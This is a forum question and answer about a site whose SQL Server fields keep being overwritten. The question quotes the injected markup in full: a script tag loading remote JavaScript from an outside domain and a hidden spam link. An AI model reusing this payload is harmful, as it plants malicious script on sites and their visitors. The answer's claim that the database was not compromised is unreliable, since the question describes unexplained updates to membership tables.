Is it a SQL injection?

Question

I am finding my SQL Server database fields getting hacked as follows. Please note that Original Content is existing value of the field and it gets changed to following.

Original Content</title><script src=http://dfrgcc.com/ur.php></script></title><a style=position:absolute;left:-9999px;top:-9999px; href=http://file-dl.com/show.php?id=6 >crack</a>

I assume it's a SQL injection attack. If not, please guide. I have ensured following, however the DB gets hacked every few days.

1) All my data access is in dataset files i.e. app_code\DataLayer.xsd. I call my data methods as follows.

Dim memberDAL As new membersTableAdapter 
Dim memberName As String = tbName.text
memberDAL.insertMember(memberName)

Does above code gets qualified as parametrized query. Is it safe data access as far as my problem is concerned. All data access is done in this manner. There are number of forms with lot of input fields, and the content DOES go in database. However what seems to be happening is not INSERT but a UPDATE. Even membership tables are being affected. e.g. in aspnet_users table a username called 'admin' changes to following.

admin</title><script src=http://dfrgcc.com/ur.php></script></title><a style=position:absolute;left:-9999px;top:-9999px; href=http://file-dl.com/show.php?id=1 >crack</a></title><script src=http://dfrgcc.com/ur.php></script>

2)I have used CAPTCHA to exclude bots, but this did not help.

I am on shared host, as per server admin I need to sanitize my code. Please advise.

Answer 1

This is an XSS attack. Your database has not been compromised, but it now contains links to externally hosted Javascript that is executed in the context of your domain. This means that they may be able to hijack users' sessions, or make requests on behalf of the user.

You should HTML encode the data that you output to the page - replacing the < with < (and the rest) will "contextually encode" the data, ensuring that what is supposed to be plain text (the "injected" HTML above) is output as text, and not interpreted by the browser as HTML (and Javascript).

To understand more, check the OWASP article.